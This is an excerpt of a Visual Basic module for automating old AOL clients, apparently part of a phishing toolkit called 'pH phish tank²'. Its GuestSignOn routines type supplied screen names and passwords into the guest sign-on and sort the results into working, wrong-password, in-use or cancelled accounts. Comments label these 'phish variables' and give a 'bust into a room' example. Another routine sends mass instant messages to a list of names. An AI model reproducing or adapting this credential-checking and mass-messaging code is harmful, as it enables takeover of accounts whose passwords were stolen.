  4662. Call PostMessage(sIDBut&, WM_LBUTTONUP, 0&, 0&)
  4663. Do
  4664. DoEvents
  4665. gbWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  4666. Loop Until gbWin& <> 0&
  4667. GuestSignOn = 5
  4668. Exit Function
  4669. ElseIf soIncorrect& <> 0& Or soSignedOn& <> 0& And soAdios& <> 0& Then
  4670. soStatic$ = GetText(soIncStatic&)
  4671. signedonStr$ = GetText(soSignedStatic&)
  4672.  
  4673. incorrectBut& = FindWindowEx(soIncorrect&, 0&, "Button", "OK")
  4674. signedonBut& = FindWindowEx(soSignedOn&, 0&, "Button", "OK")
  4675.  
  4676. Call PostMessage(incorrectBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4677. Call PostMessage(incorrectBut&, WM_KEYUP, VK_SPACE, 0&)
  4678.  
  4679. Call PostMessage(signedonBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4680. Call PostMessage(signedonBut&, WM_KEYUP, VK_SPACE, 0&)
  4681.  
  4682. Call SendMessage(guestButton2&, WM_LBUTTONDOWN, 0&, 0&)
  4683. Call SendMessage(guestButton2&, WM_LBUTTONUP, 0&, 0&)
  4684. Call SendMessage(guestButton2&, WM_KEYDOWN, VK_SPACE, 0&)
  4685. Call SendMessage(guestButton2&, WM_KEYUP, VK_SPACE, 0&)
  4686.  
  4687. Do
  4688. DoEvents
  4689. gbWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  4690. gbWin2& = FindWindowEx(mdi&, 0&, "AOL Child", "Sign On")
  4691. Loop Until gbWin& <> 0& Or gbWin2& <> 0&
  4692. If InStr(1, signedonStr$, "Your account is signed on using") <> 0& Then
  4693. GuestSignOn = 3
  4694. ElseIf InStr(1, soStatic$, "and/or password,") <> 0& Then
  4695. GuestSignOn = 2
  4696. ElseIf InStr(1, signedonStr$, "account has been cancelled.") <> 0& Then
  4697. GuestSignOn = 2
  4698. End If
  4699. Exit Function
  4700. ElseIf soAdios& <> 0& And soRICHCNTL <> 0& And InStr(1, soRICHText$, " not currently active.") <> 0& Then
  4701. GuestSignOn = 2
  4702. Exit Function
  4703. End If
  4704. End Function
  4705.  
  4706. Public Function GuestSignOn25(screenname As String, Password As String) As Integer
  4707. 'phish variables...
  4708. '1 = signed on correctly
  4709. '2 = incorret password
  4710. '3 = currently signed on
  4711. '4 = invalid acct [not active] / suspended
  4712. '5 = int account
  4713.  
  4714. 'example:
  4715. 'If GuestSignOn("kai", "123456") = 1 Then
  4716. ' bust into a room
  4717. 'Else
  4718. ' Call MsgBox("couldn't signon 'kai'", vbCritical + vbOKOnly, "signon error")
  4719. 'End If
  4720.  
  4721. Dim aol As Long, mdi As Long
  4722. Dim soWin As Long, soCombo As Long, soButton As Long, soEdit As Long
  4723. Dim cError As Long, cbut As Long
  4724. Dim guestwin As Long, guestEdit1 As Long, guestEdit2 As Long, guestButton As Long, guestCancel As Long, GuestStatic As Long
  4725. Dim welWin As Long, nWin As Long, nBut As Long, nStatic As Long, nString As String
  4726. Dim gbWin As Long, gbStatic As Long, gbString As String, gbMsg As Long, gbBut As Long
  4727. Dim sIDMod As Long, sIDBut As Long
  4728. Dim gWin As Long
  4729.  
  4730. aol& = FindWindow("AOL Frame25", vbNullString)
  4731. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4732.  
  4733. If aol& = 0& Then GuestSignOn25 = 0: Exit Function
  4734.  
  4735. GuestSignOn25 = 0
  4736.  
  4737. If GetUser <> "" Then
  4738. Call SignOff25
  4739. If IsNumeric(GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini")) = True Then
  4740. pause (GetFromINI("ph2", "signon pause", App.Path + "\ph2.ini"))
  4741. End If
  4742. End If
  4743.  
  4744. Do
  4745. DoEvents
  4746. aol& = FindWindow("AOL Frame25", vbNullString)
  4747. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4748. soWin& = FindSignOnWindow
  4749. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  4750. soButton& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  4751. If AOLVersion = "3" Then
  4752. soButton& = FindWindowEx(soWin&, soButton&, "_AOL_Icon", vbNullString)
  4753. soButton& = FindWindowEx(soWin&, soButton&, "_AOL_Icon", vbNullString)
  4754. End If
  4755. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  4756. Loop Until soWin& <> 0& And soCombo& <> 0& And soButton& <> 0&
  4757.  
  4758. Call SendMessage(soCombo&, CB_SETCURSEL, SendMessage(soCombo&, CB_GETCOUNT, 0&, 0&) - 2, 0&)
  4759.  
  4760. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, "guestso")
  4761.  
  4762. Call SendMessageLong(soButton&, WM_CHAR, ENTER_KEY, 0&)
  4763. Call SendMessageLong(soButton&, WM_CHAR, ENTER_KEY, 0&)
  4764.  
  4765. Do
  4766. DoEvents
  4767. cError& = FindWindow("#32770", "Connect Error")
  4768. cbut& = FindWindowEx(cError&, 0&, "Button", "OK")
  4769.  
  4770. guestwin& = FindWindow("_AOL_Modal", vbNullString)
  4771. guestEdit1& = FindWindowEx(guestwin&, 0&, "_AOL_Edit", vbNullString)
  4772. guestEdit2& = FindWindowEx(guestwin&, guestEdit1&, "_AOL_Edit", vbNullString)
  4773. guestButton& = FindWindowEx(guestwin&, 0&, "_AOL_Button", "OK")
  4774. guestCancel& = FindWindowEx(guestwin&, 0&, "_AOL_Button", "Cancel")
  4775. GuestStatic& = FindWindowEx(guestwin&, 0&, "_AOL_Static", vbNullString)
  4776.  
  4777. aol& = FindWindow("AOL Frame25", vbNullString)
  4778. If aol& = 0& Then Exit Function
  4779. Loop Until cError& <> 0& And cbut& <> 0& Or guestwin& <> 0& And guestEdit2& <> 0& And GuestStatic& <> 0& And guestCancel& <> 0&
  4780.  
  4781. If cError& <> 0& Then
  4782. Call PostMessage(cbut&, WM_KEYDOWN, VK_SPACE, 0&)
  4783. Call PostMessage(cbut&, WM_KEYUP, VK_SPACE, 0&)
  4784. Call MsgBox("an error has occured.. make sure" + vbCrLf + "that you are connected to your tcp," + vbCrLf + "there aren't any busy signals, etc..", vbCritical + vbOKOnly, "pH phish tank²")
  4785. Exit Function
  4786. End If
  4787.  
  4788. Call SendMessageByString(guestEdit1&, WM_SETTEXT, 0&, screenname)
  4789. Call SendMessageByString(guestEdit2&, WM_SETTEXT, 0&, Password)
  4790.  
  4791. Call SendMessage(guestButton&, WM_KEYDOWN, VK_SPACE, 0&)
  4792. Call SendMessage(guestButton&, WM_KEYUP, VK_SPACE, 0&)
  4793.  
  4794. Do
  4795. DoEvents
  4796. aol& = FindWindow("AOL Frame25", vbNullString)
  4797. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4798. welWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Welcome, " + GetUser + "!")
  4799. nWin& = FindWindow("#32770", "America Online")
  4800. nBut& = FindWindowEx(nWin&, 0&, "Button", "OK")
  4801. nStatic& = FindWindowEx(nWin&, 0&, "Static", vbNullString)
  4802. nStatic& = FindWindowEx(nWin&, nStatic&, "Static", vbNullString)
  4803. nString$ = GetText(nStatic&)
  4804. gbWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Goodbye from America Online!")
  4805. If AOLVersion = "2.5" Then
  4806. gbStatic& = FindWindowEx(gbWin&, 0&, "_AOL_Static", vbNullString)
  4807. gbStatic& = FindWindowEx(gbWin&, gbStatic&, "_AOL_Static", vbNullString)
  4808. Else
  4809. gbStatic& = FindWindowEx(gbWin&, 0&, "RICHCNTL", vbNullString)
  4810. gbStatic& = FindWindowEx(gbWin&, gbStatic&, "RICHCNTL", vbNullString)
  4811. End If
  4812. gbString$ = GetText(gbStatic&)
  4813. gbMsg& = FindWindow("#32770", "America Online")
  4814. gbBut& = FindWindowEx(gbWin&, 0&, "Button", "OK")
  4815. sIDMod& = FindWindow("_AOL_Modal", "SecurID Code")
  4816. sIDBut& = FindWindowEx(sIDMod&, 0&, "_AOL_Button", vbNullString)
  4817. sIDBut& = FindWindowEx(sIDMod&, sIDBut&, "_AOL_Button", vbNullString)
  4818. If aol& = 0& Then Exit Function
  4819. Loop Until InStr(1, gbString$, "not currently active") <> 0& Or InStr(1, gbString$, "Invalid account") <> 0& Or welWin& <> 0& Or nWin& <> 0& And nBut& <> 0& And nStatic& <> 0& And nString$ <> "" Or sIDMod& <> 0& And sIDBut& <> 0&
  4820.  
  4821. If InStr(1, gbString$, "not currently active") <> 0& Then
  4822. GuestSignOn25 = 4
  4823. Exit Function
  4824. ElseIf InStr(1, gbString$, "Invalid account") <> 0& Then
  4825. GuestSignOn25 = 4
  4826. Exit Function
  4827. End If
  4828.  
  4829. If welWin& <> 0& Then
  4830. GuestSignOn25 = 1
  4831. ElseIf nWin& <> 0& Then
  4832. If InStr(1, nString$, "name and/or password") <> 0& Then
  4833. Call SendMessage(nBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4834. Call SendMessage(nBut&, WM_KEYUP, VK_SPACE, 0&)
  4835.  
  4836. Call SendMessage(guestCancel&, WM_KEYDOWN, VK_SPACE, 0&)
  4837. Call SendMessage(guestCancel&, WM_KEYUP, VK_SPACE, 0&)
  4838.  
  4839. Do
  4840. DoEvents
  4841. gWin& = FindSignOnWindow
  4842. Loop Until gWin <> 0&
  4843. Call ModalKill
  4844. GuestSignOn25 = 2
  4845. ElseIf InStr(1, nString$, "per account can be online") <> 0& Then
  4846. Call PostMessage(nBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4847. Call PostMessage(nBut&, WM_KEYUP, VK_SPACE, 0&)
  4848.  
  4849. 'Call PostMessage(guestCancel&, WM_KEYDOWN, VK_SPACE, 0&)
  4850. 'Call PostMessage(guestCancel&, WM_KEYUP, VK_SPACE, 0&)
  4851. GuestSignOn25 = 3
  4852. ElseIf InStr(1, nString$, "account has been cancelled") <> 0& Then
  4853. Call PostMessage(nBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4854. Call PostMessage(nBut&, WM_KEYUP, VK_SPACE, 0&)
  4855. GuestSignOn25 = 4
  4856. End If
  4857. Exit Function
  4858. ElseIf sIDMod& <> 0& Then
  4859. Call PostMessage(sIDBut&, WM_KEYDOWN, VK_SPACE, 0&)
  4860. Call PostMessage(sIDBut&, WM_KEYUP, VK_SPACE, 0&)
  4861. Do
  4862. DoEvents
  4863. aol& = FindWindow("AOL Frame25", vbNullString)
  4864. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  4865. gWin& = FindSignOnWindow
  4866. Loop Until gWin& <> 0&
  4867. GuestSignOn25 = 5
  4868. End If
  4869.  
  4870. End Function
  4871.  
  4872. Public Sub hideaol()
  4873. 'hides aol
  4874. Dim aol As Long
  4875.  
  4876. aol& = FindWindow("AOL Frame25", vbNullString)
  4877. Call ShowWindow(aol&, SW_HIDE)
  4878. End Sub
  4879.  
  4880. Public Function hWndAOLVersion(AOLhWnd As Long) As String
  4881. 'gets the aol version of whatever
  4882. 'long value you put in
  4883. 'this code was made for the:
  4884. '"clone_*" subs
  4885. Dim aol As Long, gMenu As Long, Mnu As Long
  4886. Dim sMenu As Long, sItem As Long, mString As String
  4887. Dim fString As Long, tb As Long, TBar As Long
  4888. Dim tCombo As Long, tEdit As Long
  4889.  
  4890. aol& = AOLhWnd&
  4891. tb& = FindWindowEx(aol&, 0&, "AOL Toolbar", vbNullString)
  4892. TBar& = FindWindowEx(tb&, 0&, "_AOL_Toolbar", vbNullString)
  4893. tCombo& = FindWindowEx(TBar&, 0&, "_AOL_Combobox", vbNullString)
  4894. tEdit& = FindWindowEx(tCombo&, 0&, "Edit", vbNullString)
  4895.  
  4896. If tEdit& <> 0& Then
  4897. gMenu& = GetMenu(AOLhWnd&)
  4898.  
  4899. sMenu& = GetSubMenu(gMenu&, 4&)
  4900. sItem& = GetMenuItemID(sMenu&, 9&)
  4901. mString$ = String$(100, " ")
  4902.  
  4903. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  4904.  
  4905. If InStr(1, LCase(mString$), LCase("&What's New in AOL 5.0")) <> 0& Then
  4906. hWndAOLVersion = "5"
  4907. Else
  4908. hWndAOLVersion = "4"
  4909. End If
  4910. ElseIf tEdit& = 0& Then
  4911. gMenu& = GetMenu(AOLhWnd&)
  4912.  
  4913. Mnu& = GetMenuItemCount(GetMenu(AOLhWnd&))
  4914. If Mnu& = 8 Then
  4915. sMenu& = GetSubMenu(gMenu&, 1)
  4916. sItem& = GetMenuItemID(sMenu&, 8)
  4917. mString$ = String$(100, " ")
  4918. Else
  4919. sMenu& = GetSubMenu(gMenu&, 0)
  4920. sItem& = GetMenuItemID(sMenu&, 8)
  4921. mString$ = String$(100, " ")
  4922. End If
  4923.  
  4924. fString& = GetMenuString(sMenu&, sItem&, mString$, 100, 1)
  4925.  
  4926. If InStr(1, LCase(mString$), LCase("&LOGGING...")) <> 0& Then
  4927. hWndAOLVersion = "2.5"
  4928. Else
  4929. hWndAOLVersion = "3"
  4930. End If
  4931. End If
  4932. End Function
  4933.  
  4934. Public Sub IgnoreIndex(rIndex As Long, Unx As Boolean)
  4935. 'ignores screen name by index
  4936. 'if you want to ignore them, make unx = false
  4937. 'if you want to unignore them, make unx = true
  4938. Dim rWin As Long, rList As Long, xWin As Long
  4939. Dim xCheck As Long, xState As Long
  4940.  
  4941. If rIndex& > RoomCount& - 1 Then Exit Sub
  4942.  
  4943. rWin& = FindRoom&
  4944. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  4945. Call SendMessage(rList&, LB_SETCURSEL, rIndex&, 0&)
  4946. Call PostMessage(rList&, WM_LBUTTONDBLCLK, 0&, 0&)
  4947.  
  4948. Do
  4949. DoEvents
  4950. xWin& = FindIgnore
  4951. Loop Until xWin& <> 0&
  4952.  
  4953. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Checkbox", vbNullString)
  4954.  
  4955. Do
  4956. DoEvents
  4957. xState& = SendMessage(xCheck&, BM_GETCHECK, 0&, 0&)
  4958. If Unx = False Then
  4959. If xState& = 1 Then Exit Do
  4960. Else
  4961. If xState& = 0 Then Exit Do
  4962. End If
  4963. Call PostMessage(xCheck&, WM_LBUTTONDOWN, 0&, 0&)
  4964. Call PostMessage(xCheck&, WM_LBUTTONUP, 0&, 0&)
  4965. Loop 'Until xState& <> 0&
  4966.  
  4967. Call PostMessage(xWin&, WM_CLOSE, 0&, 0&)
  4968.  
  4969. End Sub
  4970.  
  4971. Public Sub IgnoreIndex25(rIndex As Long, Unx As Boolean)
  4972. 'ignores screen name by index
  4973. 'if you want to ignore them, make unx = false
  4974. 'if you want to unignore them, make unx = true
  4975. Dim rWin As Long, rList As Long, xWin As Long
  4976. Dim xCheck As Long, xState As Long
  4977.  
  4978. If rIndex& > RoomCount25& - 1 Then Exit Sub
  4979.  
  4980. rWin& = FindRoom25&
  4981. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  4982. Call SendMessage(rList&, LB_SETCURSEL, rIndex&, 0&)
  4983. Call PostMessage(rList&, WM_LBUTTONDBLCLK, 0&, 0&)
  4984.  
  4985. Do
  4986. DoEvents
  4987. xWin& = FindIgnore25
  4988. Loop Until xWin& <> 0&
  4989.  
  4990. xCheck& = FindWindowEx(xWin&, 0&, "_AOL_Button", vbNullString)
  4991.  
  4992. Do
  4993. DoEvents
  4994. xState& = SendMessage(xCheck&, BM_GETCHECK, 0&, 0&)
  4995. If Unx = False Then
  4996. If xState& = 1 Then Exit Do
  4997. Else
  4998. If xState& = 0 Then Exit Do
  4999. End If
  5000. Call PostMessage(xCheck&, WM_LBUTTONDOWN, 0&, 0&)
  5001. Call PostMessage(xCheck&, WM_LBUTTONUP, 0&, 0&)
  5002. Loop 'Until xState& <> 0&
  5003.  
  5004. Call PostMessage(xWin&, WM_CLOSE, 0&, 0&)
  5005.  
  5006. End Sub
  5007.  
  5008. Public Sub IgnoreName(sName As String, Unx As Boolean, Optional exact As Boolean)
  5009. 'ignores screen name in chat using
  5010. 'their name as a string.
  5011. 'if you want to ignore him, make unx = false
  5012. 'if you want to unignore him, make unx = true
  5013. On Error Resume Next
  5014. Dim rWin As Long, rList As Long, sThread As Long, mThread As Long
  5015. Dim screenname As String, itmHold As Long, psnHold As Long
  5016. Dim cProcess As Long, Index As Long, rBytes As Long
  5017.  
  5018.  
  5019. rWin& = FindRoom&
  5020. If rWin& = 0& Then Exit Sub
  5021.  
  5022. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  5023. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  5024. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  5025. If mThread& Then
  5026. For Index& = 0 To SendMessage(rList, LB_GETCOUNT, 0, 0) - 1
  5027. screenname$ = String$(4, vbNullChar)
  5028. itmHold& = SendMessage(rList, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  5029. itmHold& = itmHold& + 24
  5030. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  5031. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  5032. psnHold& = psnHold& + 6
  5033. screenname$ = String$(16, vbNullChar)
  5034. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  5035. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  5036. If screenname$ <> GetUser$ Then
  5037. If exact = False Then
  5038. If InStr(1, LCase(TrimSpaces(screenname$)), LCase(TrimSpaces(sName$))) <> 0& Then
  5039. Call IgnoreIndex(Index&, Unx)
  5040. End If
  5041. Else
  5042. If LCase(screenname$) = LCase(sName$) Then
  5043. Call IgnoreIndex(Index&, Unx)
  5044. End If
  5045. End If
  5046. End If
  5047. Next Index&
  5048. Call CloseHandle(mThread)
  5049. End If
  5050. End Sub
  5051.  
  5052. Public Sub IgnoreName25(sName As String, Unx As Boolean, Optional exact As Boolean)
  5053. 'ignores screen name in chat using
  5054. 'their name as a string.
  5055. 'if you want to ignore him, make unx = false
  5056. 'if you want to unignore him, make unx = true
  5057.  
  5058. 'this sub only works for me on 3.0..
  5059. 'on 2.5 it gets every sn as 'p' because
  5060. 'aol 2.5 is 16 bit
  5061. On Error Resume Next
  5062. Dim rWin As Long, rList As Long, sThread As Long, mThread As Long
  5063. Dim screenname As String, itmHold As Long, psnHold As Long
  5064. Dim cProcess As Long, Index As Long, rBytes As Long, kai As String
  5065.  
  5066.  
  5067. rWin& = FindRoom25&
  5068. If rWin& = 0& Then Exit Sub
  5069.  
  5070. rList& = FindWindowEx(rWin&, 0&, "_AOL_Listbox", vbNullString)
  5071. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  5072. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  5073. If mThread& Then
  5074. For Index& = 0 To SendMessage(rList, LB_GETCOUNT, 0, 0) - 1
  5075. screenname$ = String$(4, vbNullChar)
  5076. itmHold& = SendMessage(rList, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  5077. itmHold& = itmHold& + 24
  5078. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  5079. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  5080. psnHold& = psnHold& + 6
  5081. screenname$ = String$(16, vbNullChar)
  5082. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  5083. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  5084. If screenname$ <> GetUser$ And Trim(screenname$) <> "" Then
  5085. If exact = False Then
  5086. screenname$ = LCase(TrimSpaces(screenname$))
  5087. sName$ = LCase(TrimSpaces(sName$))
  5088. If InStr(1, screenname$, sName$) <> 0& Then
  5089. Call IgnoreIndex25(Index&, Unx)
  5090. pause (0.6)
  5091. End If
  5092. Else
  5093. If LCase(screenname$) = LCase(sName$) Then
  5094. Call IgnoreIndex25(Index&, Unx)
  5095. pause (0.6)
  5096. End If
  5097. End If
  5098. End If
  5099. Next Index&
  5100. Call CloseHandle(mThread)
  5101. End If
  5102. End Sub
  5103.  
  5104. Public Sub IMListbox(list As ListBox, Message As String)
  5105. 'sends an im to every
  5106. 'item(sn) in the listbox
  5107. Dim imLong As Long
  5108.  
  5109. For imLong& = 0& To list.ListCount - 1
  5110. Call InstantMessage(list.list(imLong&), Message$)
  5111. pause (2)
  5112. Next imLong&
  5113.  
  5114. End Sub
  5115.  
  5116. Public Sub ImsOff()
  5117. 'turns user's im's off
  5118. Dim aol As Long, mdi As Long
  5119. Dim IMWin As Long, imEdit As Long, imCNTL As Long
  5120. Dim imicon As Long, imLong As Long
  5121. Dim ciWin As Long, ciBut As Long
  5122.  
  5123. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  5124. Call IMsOff25
  5125. Exit Sub
  5126. End If
  5127.  
  5128. Call ToolKeyword("aol://9293:$im_off")
  5129.  
  5130. Do
  5131. DoEvents
  5132. aol& = FindWindow("AOL Frame25", vbNullString)
  5133. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5134. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5135. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5136. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5137. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5138. For imLong& = 1 To 9
  5139. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5140. Next imLong&
  5141. Loop Until IMWin& <> 0& And imEdit& <> 0& And imCNTL& <> 0& And imicon& <> 0&
  5142.  
  5143. pause (0.1)
  5144.  
  5145. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5146. For imLong& = 1 To 9
  5147. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5148. Next imLong&
  5149.  
  5150. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, "$IM_OFF")
  5151. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, "ims off")
  5152.  
  5153. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  5154. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  5155.  
  5156. Do
  5157. DoEvents
  5158. ciWin& = FindWindow("#32770", "America Online")
  5159. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  5160. Loop Until ciWin& <> 0& And ciBut& <> 0&
  5161.  
  5162. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5163. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  5164.  
  5165. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5166. End Sub
  5167.  
  5168. Public Sub IMsOff25()
  5169. 'turns user's im's off
  5170. Dim aol As Long, mdi As Long
  5171. Dim IMWin As Long, imEdit As Long, imEdit2 As Long, IMButton As Long, imLong As Long
  5172. Dim ciWin As Long, ciBut As Long
  5173.  
  5174. aol& = FindWindow("AOL Frame25", vbNullString)
  5175. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5176.  
  5177. Call RunMenuByString("send an instant message")
  5178.  
  5179. Do
  5180. DoEvents
  5181. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5182. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5183. If AOLVersion = "2.5" Then
  5184. imEdit2& = FindWindowEx(IMWin&, imEdit&, "_AOL_Edit", vbNullString)
  5185. Else
  5186. imEdit2& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5187. End If
  5188. If AOLVersion = "2.5" Then
  5189. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Available?")
  5190. Else
  5191. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5192. For imLong& = 1 To 9
  5193. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5194. Next imLong&
  5195. End If
  5196. Loop Until IMButton& <> 0& And imEdit& <> 0& And imEdit2& <> 0& And IMButton& <> 0&
  5197.  
  5198. If AOLVersion = "3" Then
  5199. pause (0.1)
  5200.  
  5201. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5202. For imLong& = 1 To 9
  5203. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5204. Next imLong&
  5205. End If
  5206.  
  5207. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, "$IM_OFF")
  5208. Call SendMessageByString(imEdit2&, WM_SETTEXT, 0&, "im off")
  5209.  
  5210. If AOLVersion = "3" Then
  5211. Call SendMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  5212. Call SendMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  5213. Else
  5214. Call SendMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  5215. Call SendMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  5216. End If
  5217.  
  5218. Do
  5219. DoEvents
  5220. ciWin& = FindWindow("#32770", "America Online")
  5221. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  5222. Loop Until ciWin& <> 0& And ciBut& <> 0&
  5223.  
  5224. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5225. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  5226.  
  5227. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5228. End Sub
  5229.  
  5230. Public Sub imson()
  5231. 'turns user's im's on
  5232. Dim aol As Long, mdi As Long
  5233. Dim IMWin As Long, imEdit As Long, imCNTL As Long
  5234. Dim imicon As Long, imLong As Long
  5235. Dim ciWin As Long, ciBut As Long
  5236.  
  5237. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  5238. Call IMsOn25
  5239. Exit Sub
  5240. End If
  5241.  
  5242. Call ToolKeyword("aol://9293:$im_on")
  5243.  
  5244. Do
  5245. DoEvents
  5246. aol& = FindWindow("AOL Frame25", vbNullString)
  5247. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5248. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5249. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5250. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5251. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5252. For imLong& = 1 To 9
  5253. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5254. Next imLong&
  5255. Loop Until IMWin& <> 0& And imEdit& <> 0& And imCNTL& <> 0& And imicon& <> 0&
  5256.  
  5257. pause (0.1)
  5258.  
  5259. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5260. For imLong& = 1 To 9
  5261. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  5262. Next imLong&
  5263.  
  5264. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, "$IM_ON")
  5265. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, "ims on")
  5266.  
  5267. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  5268. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  5269.  
  5270. Do
  5271. DoEvents
  5272. ciWin& = FindWindow("#32770", "America Online")
  5273. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  5274. Loop Until ciWin& <> 0& And ciBut& <> 0&
  5275.  
  5276. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  5277. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  5278.  
  5279. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  5280. End Sub
  5281.  
  5282. Public Sub IMsOn25()
  5283. 'turns user's im's on
  5284. Dim aol As Long, mdi As Long
  5285. Dim IMWin As Long, imEdit As Long, imEdit2 As Long, IMButton As Long, imLong As Long
  5286. Dim ciWin As Long, ciBut As Long
  5287.  
  5288. aol& = FindWindow("AOL Frame25", vbNullString)
  5289. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  5290.  
  5291. Call RunMenuByString("send an instant message")
  5292.  
  5293. Do
  5294. DoEvents
  5295. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  5296. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  5297. If AOLVersion = "2.5" Then
  5298. imEdit2& = FindWindowEx(IMWin&, imEdit&, "_AOL_Edit", vbNullString)
  5299. Else
  5300. imEdit2& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  5301. End If
  5302. If AOLVersion = "2.5" Then
  5303. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Available?")
  5304. Else
  5305. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  5306. For imLong& = 1 To 9
  5307. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  5308. Next imLong&
  5309. End If
  5310. Loop Until IMButton& <> 0& And imEdit& <> 0& And imEdit2& <> 0& And IMButton& <> 0&
  5311.  
  5312. If AOLVersion = "3" Then
  5313. pause (0.1)
  5314.  
